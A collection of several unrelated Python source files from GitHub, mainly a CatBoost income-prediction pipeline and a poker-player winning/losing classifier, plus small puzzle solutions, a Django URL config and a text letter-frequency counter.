df_prof4['Words'].tolist():\n# if j in i:\n# a = df_prof4[df_prof4['Words'] == j]['var'].tolist()\n# b = df_prof4[df_prof4['Words'] == j]['mean'].tolist()\n# if a[0] < least_var:\n# least_var = a[0]\n# d_prof[i] = b[0]\n\n# df3['Profession2'] = df3['Profession'].map(d_prof)\n# cat_vars.append('Profession2')\n\n\n# In[11]:\n\n\ndef encoder(df3,cat_vars):\n df4 = df3.copy()\n for i in cat_vars:\n mean_encode = df4.groupby(i)['Income in EUR'].mean()\n freq_encode = df4.groupby(i)['Income in EUR'].count()\n df4.loc[:, i] = (df4[i].map(mean_encode)*df4[i].map(freq_encode) + 7*df4['Income in EUR'].mean())/(df4[i].map(freq_encode)+7)\n return df4\n\n\n# In[12]:\n\n\n# area = np.pi*3\n\n# for i in df4.drop(columns = [\"Income in EUR\",'Instance']).columns:\n# x = df4[i]\n# y = df4['Income in EUR']\n# plt.scatter(x, y, s=area, alpha=0.5)\n# plt.xlabel(i)\n# plt.ylabel('Income in EUR')\n# plt.show()\n\n\n# In[13]:\n\n\ndef train_data_prep(df4):\n df = df4.drop(columns = ['Instance'])\n df['Income in EUR2'] = pd.qcut(df['Income in EUR'], 10, labels=False)\n y = df.pop('Income in EUR2')\n X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.33, random_state=42, stratify=y)\n \n return X_train.drop(columns = ['Income in EUR']), X_train[['Income in EUR']], X_test.drop(columns = ['Income in EUR']), X_test[['Income in EUR']]\n\n\n# In[14]:\n\n\n# clf = RandomForestRegressor(n_estimators=100)\n# clf = clf.fit(X_train, Y_train)\ndef modeller(X_train, Y_train, X_test, Y_test, extra_cols):\n X_train.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n X_test.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# xg_reg = xgb.XGBRegressor(base_score=0.5, booster='gbtree', colsample_bylevel=1,\n# colsample_bytree=1.0, gamma=0, learning_rate=0.1, max_delta_step=0,\n# max_depth=6, min_child_weight=1.2, missing=None, n_estimators=100,\n# n_jobs=1, nthread=None, 
objective='reg:linear', random_state=0,\n# reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,\n# silent=True, subsample=1)\n# clf = xg_reg.fit(X_train, Y_train)\n \n clf = CatBoostRegressor(iterations=1400,\n learning_rate=0.02,\n depth=6,\n eval_metric='RMSE',\n# silent = True,\n random_seed = 23,\n bagging_temperature = 0.2,\n od_type='Iter',\n metric_period = 250,\n od_wait=100)\n clf.fit(X_train, Y_train,\n eval_set=(X_test,Y_test),\n# cat_features=cat_vars_l,\n use_best_model=True,\n verbose=True)\n return clf\n\n\n# In[15]:\n\n\n# X_test.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# print(clf.score(X_test,Y_test))\n# rms = sqrt(mean_squared_error(Y_test, clf.predict(X_test)))\n# rms\n\n\n# In[16]:\n\n\n# importances = list(clf.feature_importances_)\n# feature_importances = [(feature, round(importance, 2)) for feature, importance in zip(X.columns, importances)]\n# feature_importances = sorted(feature_importances, key = lambda x: x[1], reverse = True)\n# [print('Variable: {:20} Importance: {}'.format(*pair)) for pair in feature_importances]\n\n\n# In[17]:\n\n\n# X.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# scores = cross_val_score(clf, X, Y, cv=5)\n# print(scores.mean())\n# scores\n\n\n# In[18]:\n\n\ndef result(clf,extra_cols,sig_words,df3,mode='check'):\n if mode == 'check':\n dfkaggle = df_val\n else:\n dfkaggle = pd.read_csv('../Data/tcd ml 2019-20 income prediction test (without labels).csv')\n\n dfkaggle2 = convert_lower(dfkaggle)\n dfkaggle2 = unknown_to_nulls(dfkaggle2)\n dfkaggle2.loc[:,'Wears Glasses'] = dfkaggle2.loc[:,'Wears Glasses'].apply(str)\n dfkaggle2.loc[:,'Wears Glasses'] = np.where(dfkaggle2.loc[:,'Wears Glasses'] == '0', 'No',np.where(dfkaggle2.loc[:,'Wears Glasses'] == '1', 'Yes',dfkaggle2.loc[:,'Wears Glasses']))\n dfkaggle2.loc[:,'Gender'] = dfkaggle2.loc[:,'Gender'].replace('other',np.nan)\n dfkaggle2 = zero_to_nulls(dfkaggle2)\n\n for i in sig_words:\n dfkaggle2['is_'+i] = np.where(dfkaggle2['Profession'].str.contains(i),'yes','no')\n\n def miss_val_impute2(df, cat_vars, num_imp = 'mean'):\n for i in df:\n if i not in cat_vars:\n if num_imp == 'mean':\n x = df3[i].mean()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'median':\n x = df3[i].median()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'mode':\n x = df3[i].mode()\n df[i] = df[i].replace(np.nan,x)\n else:\n df[i] = np.where(df[i].isna(),df3[i].mode(),df[i])\n return df\n\n dfkaggle3 = dfkaggle2.copy()\n cat_vars = ['Gender','Country','Profession','University Degree','Wears Glasses','Hair Color'] + extra_cols\n \n if mode == 'check':\n dfkaggle3 = dfkaggle3.drop(columns = 'Income in EUR')\n else:\n dfkaggle3 = dfkaggle3.drop(columns = 'Income')\n \n dfkaggle3 = miss_val_impute2(dfkaggle3, cat_vars,num_imp = 'median')\n dfkaggle3.head()\n\n dfkaggle4 = dfkaggle3.copy()\n for i in cat_vars:\n mean_encode = df3.groupby(i)['Income in EUR'].mean()\n# dfkaggle4.loc[:, i] = dfkaggle4[i].map(mean_encode)\n freq_encode = df3.groupby(i)['Income in EUR'].count()\n dfkaggle4.loc[:, i] = (dfkaggle4[i].map(mean_encode)*dfkaggle4[i].map(freq_encode) + 7*df3['Income in EUR'].mean())/(dfkaggle4[i].map(freq_encode)+7)\n dfkaggle4.head()\n\n data_explore(dfkaggle4)\n dfkaggle4 = dfkaggle4.drop(columns = 'Instance')\n\n for i in dfkaggle4:\n dfkaggle4[i] = 
np.where(dfkaggle4[i].isna(),df4[i].median(),dfkaggle4[i])\n\n    # dfkaggle4 = dfkaggle4.fillna(0)\n\n    dfkaggle4.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n\n    dfkaggle4['Income in EUR'] = clf.predict(dfkaggle4)\n    dfkaggle4['Instance'] = dfkaggle3['Instance']\n    dfkaggle4 = dfkaggle4[['Instance','Income in EUR']]\n#     dfkaggle4.columns = ['Instance','Income in EUR']\n    \n    if mode == 'check':\n        rms = sqrt(mean_squared_error(list(df_val['Income in EUR']), list(dfkaggle4['Income in EUR'])))\n        return rms\n    else:\n        return dfkaggle4\n\n\n# In[19]:\n\n\n# # ### Splitting dataframe\nscores = []\noutput = pd.DataFrame()\niters = []\nfor i in range(15):\n    df_val, df = train_test()\n    df = rem_outliers(df)\n    df2 = cleaner1(df)\n    df2, extra_cols, sig_words = profession_cleaner(df, df2, stretch = 0.2)\n    df3,cat_vars = mvi(df2, extra_cols)\n    df4 = encoder(df3,cat_vars)\n    X_train, Y_train, X_test, Y_test = train_data_prep(df4)\n    clf = modeller(X_train, Y_train, X_test, Y_test, extra_cols)\n    \n    rms = result(clf,extra_cols,sig_words,df3,mode = 'check')\n    print('iteration = '+str(i)+' score = '+str(rms))\n    joblib.dump(clf, 'Models for v10 KFolds/clf'+str(i))\n    \n    if rms <= 60000:\n        scores.append(rms)\n        print('iteration = '+str(i)+' score = '+str(rms))\n        res = result(clf,extra_cols,sig_words,df3,mode = 'kaggle')\n        output = output.append(res)\n        print('Completed iteration : ' + str(i))\n        iters.append(i)\n    \nprint('Mean score = ' + str(sum(scores)/len(scores)))\n\n\n# In[22]:\n\n\noutput2 = output.copy()\n# # output2\noutput3 = output2.groupby(['Instance']).mean()\noutput3.head()\noutput3.to_csv('test15 catboost.csv')\n\n","repo_name":"amittal-tcd/TCD-work","sub_path":"Sem 1/Machine Learning/Income Prediction Kaggle Competition/Income Prediction_v15 C1DC75369657495E4C5B.py","file_name":"Income Prediction_v15 C1DC75369657495E4C5B.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"19047484693","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import export_graphviz\nfrom IPython.display import Image\nfrom pydotplus import graph_from_dot_data\nfrom xgboost import plot_tree\nfrom pprint import pprint\n\ndef plot_confusion_matrix(labels, preds_proba, classes, threshold=0.5, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n    \"\"\"Calculate the confusion matrix for a determined threshold and plot it in a nicely formatted way\n\n    Parameters:\n    labels (list): List of labels (class)\n    preds_proba (list): List of predicted probabilities\n    classes (list): Class names used for the axis ticks\n    threshold (float): Threshold\n    normalize (bool): normalize True will plot using percentages, normalize False will plot using raw values\n    title (str): Plot's title\n    cmap (str): Color Map\n\n\n    Returns:\n    ndarray: The raw (non-normalised) confusion matrix\n\n    \"\"\"\n    preds = preds_proba_to_preds_class(preds_proba,threshold)\n    cm_std = confusion_matrix(labels, preds)\n    # Check if normalize is set to True\n    # If so, normalize the raw confusion matrix before visualizing\n    if normalize:\n
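        # row-normalise: divide each row (the true class) by its row total so cells read as rates\n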
        cm = cm_std.astype('float') / cm_std.sum(axis=1)[:, np.newaxis]\n        print(\"Normalized confusion matrix\")\n    else:\n        cm = cm_std\n        print('Confusion matrix, without normalization')\n\n    print(cm)\n\n    plt.imshow(cm, cmap=cmap)\n    \n    # Add title and axis labels \n    plt.title(title)\n    plt.ylabel('True label')\n    plt.xlabel('Predicted label')\n    \n    # Add appropriate axis scales\n    tick_marks = np.arange(len(classes))\n    plt.xticks(tick_marks, classes, rotation=45)\n    plt.yticks(tick_marks, classes)\n    \n    # Text formatting\n    fmt = '.2f' if normalize else 'd'\n    # Add labels to each cell\n    thresh = cm.max() / 2.\n    # Here we iterate through the confusion matrix and append labels to our visualization \n    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n        plt.text(j, i, format(cm[i, j], fmt),\n                 horizontalalignment='center',\n                 color='white' if cm[i, j] > thresh else 'black')\n    \n    # Add a legend\n    plt.colorbar()\n    plt.show()\n    return cm_std\n    \ndef find_best_k(X_train, y_train, X_test, y_test, min_k=1, max_k=25):\n    \"\"\"Find the best value for K in a certain range of values for KNeighborsClassifier\n\n    Parameters:\n    X_train (array-like): Training features\n    y_train (array-like): Training labels\n    X_test (array-like): Test features\n    y_test (array-like): Test labels\n    min_k (int): Minimum value for K\n    max_k (int): Maximum value for K\n\n\n    Returns:\n    int: Best value for K\n\n    \"\"\"\n    best_k = 0\n    best_score = 0.0\n    for k in range(min_k, max_k+1, 2):\n        knn = KNeighborsClassifier(n_neighbors=k)\n        knn.fit(X_train, y_train)\n        preds = knn.predict(X_test)\n        f1 = f1_score(y_test, preds)\n        if f1 > best_score:\n            best_k = k\n            best_score = f1\n    print(\"Best Value for k: {}\".format(best_k))\n    print(\"F1-Score: {}\".format(best_score))\n    return best_k\n\ndef preds_proba_to_preds_class(preds_proba,threshold):\n    \"\"\"Transform prediction probabilities into classes (booleans) using a determined threshold\n\n    Parameters:\n    preds_proba (list): List of probabilities\n    threshold (float): Threshold\n\n    Returns:\n    classes (list): List of classes\n\n    \"\"\"\n    return [True if pred > threshold else False for pred in preds_proba]\n\ndef threshold_selection(prevalence, CostFP_minus_CostTN, CostFN_minus_CostTP, y, y_hat):\n    \"\"\"Calculate the optimal threshold depending on prevalence, costs, true positive rates and false positive rates\n    \n    Args:\n        prevalence (float): The percentage of positives in the population\n        CostFP_minus_CostTN (float): The cost of false positives minus the cost of true negatives\n        CostFN_minus_CostTP (float): The cost of false negatives minus the cost of true positives\n        y (list): True labels (classes)\n        y_hat (list): Predicted proba for labels (classes)\n    \n    Returns:\n        [float]: Best threshold\n    \"\"\"\n    fpr, tpr, thresholds = roc_curve(y, y_hat)\n    m = ((1 - prevalence) / prevalence) * ((CostFP_minus_CostTN) / (CostFN_minus_CostTP))\n    fm_thresholds = []\n    for i in range(len(fpr)):\n        fm = tpr[i] - (m * fpr[i])\n        fm_thresholds.append((thresholds[i], fm))\n    fm_thresholds = sorted(fm_thresholds, key=lambda fm_value: fm_value[1], reverse=True)\n    return fm_thresholds[0][0]\n\n
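# (added) metrics() below bundles ROC plotting with the usual scores; it assumes binary\n# labels and probability scores in [0, 1].\n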
def metrics(labels, preds_proba, print_metrics=True, plot=False, threshold=0.5, rounded=4):\n    \"\"\"Plot the ROC curve, calculate and print AUC, Precision, Recall, Accuracy and F1 scores\n\n    Parameters:\n    labels (list): List of labels (classes)\n    preds_proba (list): List of predicted probabilities\n    print_metrics (bool): Print the metrics if parameter set to True\n    plot (bool): Plot the ROC curve if parameter set to True\n    threshold (float): Threshold (purely as information)\n    rounded (int): The number of digits for the scores\n\n\n    Returns:\n    scores (dict): Return a dictionary of scores (AUC, Precision, Recall, Accuracy and F1)\n\n    \"\"\"\n    test_fpr, test_tpr, test_thresholds = roc_curve(labels, preds_proba)\n    roc_auc = auc(test_fpr, test_tpr)\n    preds = preds_proba_to_preds_class(preds_proba,threshold)\n    precision = precision_score(labels, preds)\n    recall = recall_score(labels, preds)\n    accuracy = accuracy_score(labels, preds)\n    f1 = f1_score(labels, preds)\n    if plot:\n        sns.set_style('darkgrid', {'axes.facecolor': '0.9'})\n        plt.figure(figsize=(10, 8))\n        lw = 2\n        plt.plot(test_fpr, test_tpr, color='darkorange',\n                 lw=lw, label='ROC curve')\n        plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n        plt.xlim([0.0, 1.0])\n        plt.ylim([0.0, 1.05])\n        plt.yticks([i/20.0 for i in range(21)])\n        plt.xticks([i/20.0 for i in range(21)])\n        plt.xlabel('False Positive Rate')\n        plt.ylabel('True Positive Rate')\n        plt.title('Receiver operating characteristic (ROC) Curve')\n        plt.legend(loc='lower right')\n        plt.show()\n    if print_metrics:\n        print(f\"ROC AUC Score: {roc_auc}\\n\")\n        print(f\"------- Metrics for threshold {threshold} -------\")\n        print(f\"- Precision Score: {precision}\")\n        print(f\"- Recall Score: {recall}\")\n        print(f\"- Accuracy Score: {accuracy}\")\n        print(f\"- F1 Score: {f1}\\n\")\n    else:\n        return {\"roc_auc\":roc_auc, \"precision\":precision, \"recall\":recall, \"accuracy\":accuracy, \"f1\":f1}\n\n\ndef get_roc_auc(y_test, y_hat_test):\n    \"\"\"Return the ROC AUC value\n\n    Parameters:\n    y_test (list): Target Labels\n    y_hat_test (list): Predicted target labels\n\n    Returns:\n    float: Area Under The Curve of Receiver Operating Characteristics\n\n    \"\"\"\n    test_fpr, test_tpr, test_thresholds = roc_curve(y_test, y_hat_test)\n    roc_auc = auc(test_fpr, test_tpr)\n    return roc_auc\n\ndef print_corr(df, pct=0):\n    \"\"\"Prints the multicollinearity heatmap with the option of setting a minimum multicollinearity percentage\n\n    Parameters:\n    df (pandas dataframe): Pandas DataFrame\n    pct (float): Optional minimum multicollinearity percentage (multicollinearity lower than the value of the variable \"pct\" will not be shown)\n\n    Returns:\n    void: This function does not return values\n\n    \"\"\"\n    sns.set(style=\"white\")\n\n    # Compute the correlation matrix\n    if pct == 0:\n        corr = df.corr()\n    else:\n        corr = abs(df.corr()) > pct\n\n    # Generate a mask for the upper triangle\n    mask = np.zeros_like(corr, dtype=bool)\n    mask[np.triu_indices_from(mask)] = True\n\n    # Set up the matplotlib figure\n    f, ax = plt.subplots(figsize=(11, 9))\n\n    # Generate a custom diverging colormap\n    cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n    # Draw the heatmap with the mask and correct aspect ratio\n    sns.heatmap(corr, mask=mask, cmap=cmap, vmax=1, center=0, square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n\n\ndef prediction(X, model, stakes=\"default\"):\n    \"\"\"The function will predict the class of a player depending on his stats and on the stakes of the game we are playing\n    \n    Args:\n        X (dataframe): Player's stat\n        model (classifier object): A fitted classifier model\n        stakes (str): Stakes of the game (small or high)\n    \"\"\"\n    \n    #Defining thresholds\n    thresholds = {\"default\":0.5, \"small\":0.696, \"high\":0.326}\n\n    # Choosing the default threshold if the value entered for stakes isn't a key of the threshold dictionary\n    if stakes not in thresholds.keys():\n        stakes = \"default\"\n
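        # falls back to the 0.5 cut-off whenever the requested stake level is unknown\n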
print(f\"The value entered for stakes isn't recognized, therefore threshold default value: {thresholds[stakes]} was chosen\")\n\n # Chosing threshold\n threshold = thresholds[stakes]\n\n # Check and transform the format of the data if needed\n if not isinstance(X, pd.DataFrame):\n if isinstance(X, pd.Series):\n X = X.to_frame().T\n else:\n X = pd.DataFrame.from_dict(X)\n\n # Rename columns\n X.columns = X.columns.str.replace('\\n',' ')\n X.columns = X.columns.str.replace(' ','_')\n\n # Saving name\n player_name = X.Player_Name.iloc[0]\n\n # Drop useless columns\n for col in ['Player_Name', 'Site', \"Hands\", \"Net_Won\"]:\n if col in X.columns:\n X.drop([col], axis=1, inplace=True)\n\n # Add polynomials and interactions to the dataframe\n features_order = ['VP$IP',\n 'W$WSF%',\n 'WTSD%',\n 'Flop_CBet%',\n 'Turn_CBet%',\n 'River_CBet%',\n 'Fold_to_Flop_Cbet',\n 'Fold_to_River_CBet',\n 'Raise_Flop_Cbet',\n 'Raise_River_CBet',\n 'Call_Two_Raisers',\n 'vs_3Bet_Fold',\n 'vs_3Bet_Call',\n 'vs_3Bet_Raise',\n 'vs_4Bet_Fold',\n 'vs_4Bet_Call',\n 'vs_4Bet_Raise',\n 'WTSD%_*_Won_$_at_SD',\n 'Won_$_at_SD_*_River_CBet%',\n 'Won_$_at_SD_*_Raise_Two_Raisers',\n 'Won_$_at_SD_*_vs_4Bet_Call',\n 'VP$IP_*_Flop_CBet%',\n 'VP$IP_*_Fold_to_River_CBet',\n 'PFR_*_River_CBet%',\n 'PFR_*_Fold_to_Turn_CBet',\n 'Squeeze',\n 'Squeeze_^2',\n 'Squeeze_^3',\n 'Squeeze_^4',\n 'Postflop_Agg%',\n 'Postflop_Agg%_^2',\n 'Postflop_Agg%_^3',\n 'Postflop_Agg%_^4',\n 'Won_$_at_SD',\n 'Won_$_at_SD_^2',\n 'Won_$_at_SD_^3',\n 'Won_$_at_SD_^4',\n 'Raise_Turn_CBet',\n 'Raise_Turn_CBet_^2',\n 'PFR_*_Flop_CBet%',\n 'PFR_*_Flop_CBet%_^2',\n 'PFR_*_Flop_CBet%_^3',\n 'VP$IP_*_Won_$_at_SD',\n 'VP$IP_*_Won_$_at_SD_^2',\n 'VP$IP_*_Won_$_at_SD_^3',\n 'Raise_Two_Raisers',\n 'Raise_Two_Raisers_^2',\n 'Raise_Two_Raisers_^3',\n 'Raise_Two_Raisers_^4',\n 'PFR',\n 'PFR_^2',\n 'PFR_^3',\n 'Fold_to_Turn_CBet',\n 'Fold_to_Turn_CBet_^2',\n 'Fold_to_Turn_CBet_^3',\n '3Bet',\n '3Bet_^2',\n '3Bet_^3']\n\n # Recreating interactions features\n for feature in features_order:\n if \"*\" in feature and \"^\" not in feature:\n features = feature.split(\"_*_\")\n X[feature] = np.array(X[features[0]]) * np.array(X[features[1]])\n\n # Recreating polynomials features\n for feature in features_order:\n if feature[-2:-1] == \"^\":\n feature_to_poly = feature[:-3]\n exp = feature[-1]\n X[feature] = np.array(X[feature_to_poly]) ** int(exp)\n \n # Set the X columns in the right order\n X = X[features_order]\n\n # Generate prediction probabilities\n preds_proba = np.array(model.predict_proba(X))[:,1]\n pred_class = preds_proba_to_preds_class(preds_proba, threshold)\n pred_class = pred_class[0]\n if pred_class == True:\n pred_class = \"Winning Player\"\n else:\n pred_class = \"Losing Player\"\n pprint(f\"Playing a {stakes} stakes game we'll consider {player_name} a {pred_class}\")\n\nclass Prediction():\n \"\"\"This Class will predict the class (winning or losing) of a player depending on his stats and on the stakes of the game we are playing\n \n Args:\n X (dataframe): Player's stat\n model (classifier object): A fitted classifier model\n stakes (str): Stakes of the game (small or high)\n \"\"\"\n \n def __init__(self, X, model, stakes=\"default\"):\n self.X = X\n self.model = model\n self.stakes = stakes\n self.thresholds = {\"default\":0.5, \"small\":0.696, \"high\":0.326}\n self.threshold = None\n\n def get_stakes(self):\n return self.stakes\n\n def set_stakes(self, stakes):\n self.stakes = stakes\n\n def get_thresholds(self):\n return self.thresholds\n\n def 
set_thresholds(self, thresholds_dict):\n        self.thresholds = thresholds_dict\n    \n    def set_threshold(self, threshold_tuple):\n        self.thresholds[threshold_tuple[0]] = threshold_tuple[1]\n\n    def predict(self):\n        # Choosing the default threshold if the value entered for stakes isn't a key of the threshold dictionary\n        if self.stakes not in self.thresholds.keys():\n            self.stakes = \"default\"\n            print(f\"The value entered for stakes isn't recognized, therefore threshold default value: {self.thresholds[self.stakes]} was chosen\")\n\n        # Choosing the threshold\n        self.threshold = self.thresholds[self.stakes]\n\n        # Check and transform the format of the data if needed\n        if not isinstance(self.X, pd.DataFrame):\n            if isinstance(self.X, pd.Series):\n                self.X = self.X.to_frame().T\n            else:\n                self.X = pd.DataFrame.from_dict(self.X)\n\n        # Rename columns\n        self.X.columns = self.X.columns.str.replace('\\n',' ')\n        self.X.columns = self.X.columns.str.replace(' ','_')\n\n        # Saving name\n        player_name = self.X.Player_Name.iloc[0]\n\n        # Drop useless columns\n        for col in ['Player_Name', 'Site', \"Hands\", \"Net_Won\"]:\n            if col in self.X.columns:\n                self.X.drop([col], axis=1, inplace=True)\n\n        # Add polynomials and interactions to the dataframe\n        features_order = ['VP$IP',\n                        'W$WSF%',\n                        'WTSD%',\n                        'Flop_CBet%',\n                        'Turn_CBet%',\n                        'River_CBet%',\n                        'Fold_to_Flop_Cbet',\n                        'Fold_to_River_CBet',\n                        'Raise_Flop_Cbet',\n                        'Raise_River_CBet',\n                        'Call_Two_Raisers',\n                        'vs_3Bet_Fold',\n                        'vs_3Bet_Call',\n                        'vs_3Bet_Raise',\n                        'vs_4Bet_Fold',\n                        'vs_4Bet_Call',\n                        'vs_4Bet_Raise',\n                        'WTSD%_*_Won_$_at_SD',\n                        'Won_$_at_SD_*_River_CBet%',\n                        'Won_$_at_SD_*_Raise_Two_Raisers',\n                        'Won_$_at_SD_*_vs_4Bet_Call',\n                        'VP$IP_*_Flop_CBet%',\n                        'VP$IP_*_Fold_to_River_CBet',\n                        'PFR_*_River_CBet%',\n                        'PFR_*_Fold_to_Turn_CBet',\n                        'Squeeze',\n                        'Squeeze_^2',\n                        'Squeeze_^3',\n                        'Squeeze_^4',\n                        'Postflop_Agg%',\n                        'Postflop_Agg%_^2',\n                        'Postflop_Agg%_^3',\n                        'Postflop_Agg%_^4',\n                        'Won_$_at_SD',\n                        'Won_$_at_SD_^2',\n                        'Won_$_at_SD_^3',\n                        'Won_$_at_SD_^4',\n                        'Raise_Turn_CBet',\n                        'Raise_Turn_CBet_^2',\n                        'PFR_*_Flop_CBet%',\n                        'PFR_*_Flop_CBet%_^2',\n                        'PFR_*_Flop_CBet%_^3',\n                        'VP$IP_*_Won_$_at_SD',\n                        'VP$IP_*_Won_$_at_SD_^2',\n                        'VP$IP_*_Won_$_at_SD_^3',\n                        'Raise_Two_Raisers',\n                        'Raise_Two_Raisers_^2',\n                        'Raise_Two_Raisers_^3',\n                        'Raise_Two_Raisers_^4',\n                        'PFR',\n                        'PFR_^2',\n                        'PFR_^3',\n                        'Fold_to_Turn_CBet',\n                        'Fold_to_Turn_CBet_^2',\n                        'Fold_to_Turn_CBet_^3',\n                        '3Bet',\n                        '3Bet_^2',\n                        '3Bet_^3']\n\n        # Recreating interactions features\n        for feature in features_order:\n            if \"*\" in feature and \"^\" not in feature:\n                features = feature.split(\"_*_\")\n                self.X[feature] = np.array(self.X[features[0]]) * np.array(self.X[features[1]])\n\n        # Recreating polynomials features\n        for feature in features_order:\n            if feature[-2:-1] == \"^\":\n                feature_to_poly = feature[:-3]\n                exp = feature[-1]\n                self.X[feature] = np.array(self.X[feature_to_poly]) ** int(exp)\n        \n        # Set the X columns in the right order\n        self.X = self.X[features_order]\n\n        # Generate prediction probabilities\n        preds_proba = np.array(self.model.predict_proba(self.X))[:,1]\n        pred_class = preds_proba_to_preds_class(preds_proba, self.threshold)\n        pred_class = pred_class[0]\n        if pred_class:\n            pred_class = \"Winning Player\"\n        else:\n            pred_class = \"Losing Player\"\n        pprint(f\"Playing a {self.stakes} stakes game we'll consider {player_name} a 
{pred_class}\")","repo_name":"locsta/Poker-Player-Classifier","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":18769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44462642447","text":"import sys\nimport functools\ninput = sys.stdin.readline\nN = int(input())\narr = []\nresult = 0\nfor i in range(N):\n arr.append(int(input()))\nif N > 2:\n arr.sort()\n *a, b, c = arr\n num1 = sum(a) + (b * c)\n a, b, *c = arr\n num2 = sum(c) + (a * b)\n print(max(sum(arr), num1, num2))\nelse:\n print(functools.reduce(lambda a,b: a*b,arr))","repo_name":"joohyun333/programmers","sub_path":"백준/정렬/수묶기.py","file_name":"수묶기.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73184953068","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\n\n\nadmin.autodiscover()\nif settings.DEBUG:\n\turlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'gerenciador.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n # (r'^$', 'agenda.views.index'),\n (r'^$', 'agenda.views.lista'),\n (r'^adiciona/$', 'agenda.views.adiciona'),\n (r'^item/(?P<nr_item>\\d+)/$', 'agenda.views.item'),\n (r'^media/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),\n)\n","repo_name":"robesson/agenda","sub_path":"gerenciador/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23014804388","text":"'''\n Given a non-empty string check if it can be constructed by taking a substring of it\n and appending multiple copies of the substring together.\n You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.\n\n Input: \"abab\"\n Output: True\n Explanation: It's the substring \"ab\" twice.\n\n Input: \"aba\"\n Output: False\n'''\n\n# Idea here is : For a pattern to occur all characters must be present equal number of times\n# aaabbb --> This breaks the idea or abccba --> abc cba\n# which means you need somthing along with it\n# \ndef is_repeated_substring(input_string):\n i = 1\n length = len(input_string)\n while i < length:\n if length % i == 0:\n pattern = input_string[:i]\n times = length // i\n if pattern * times == input_string:\n return True\n \n i += 1\n \n return False\n\ninput_string = str(input('Enter input string :: '))\nprint('Can this string be formed by repeating its patterns :: {}'.format(is_repeated_substring(input_string)))\n","repo_name":"luthraG/ds-algo-war","sub_path":"general-practice/14_09_2019/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18796432310","text":"import requests\n#这个包不用逆向\nurl = \"https://fanyi.baidu.com/sug\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\",\n\n}\ndata = {\n \"kw\": \"dog\"\n}\nresp = requests.post(url, headers=headers, 
data=data)\nprint(resp.text)","repo_name":"konatax/crawler","sub_path":"百度翻译/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"1180787147","text":"import zipfile\n\n\ndef unzip(archive):\n    zip_file = zipfile.ZipFile(archive, 'r')\n    for i_file in zip_file.namelist():\n        zip_file.extract(i_file)\n    zip_file.close()\n\n\ndef stats(name_file):\n    result = {}\n    if name_file.endswith('zip'):\n        unzip(name_file)\n        name_file = ''.join((name_file[:-3], 'txt'))\n    file_txt = open(name_file, 'r', encoding='utf-8')\n    for i_line in file_txt:\n        for i_sym in i_line:\n            if i_sym.isalpha():\n                if i_sym not in result:\n                    result[i_sym] = 0\n                result[i_sym] += 1\n    file_txt.close()\n    return result\n\n\nfile = 'voyna-i-mir.zip'\nstats_dict = stats(file)\nstats_sort = sorted(stats_dict.items(), key=lambda x: x[1], reverse=True)\nfor nun, letter in stats_sort:\n    print(f\"The letter '{nun}' occurs {letter} times in the text\")\n\n# passed!\n","repo_name":"Mihalich2981/Python","sub_path":"Module22/09_war_and_peace/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"656917648","text":"import re\nimport numpy as np\nimport itertools\n\nstr_in = 'Stop gninnipS My sdroW!'\n\n\ndef spin_str(str_in):\n    res = ''\n    for match in re.finditer('\\w+|\\W+', str_in):\n        sym = match.group(0)\n        res += sym[::-1] if len(sym) >= 5 else sym\n\n    return res\n\n\ndef decode_morse(morse_code):\n    # Remember - you can use the preloaded MORSE_CODE dictionary:\n    # For example:\n    # 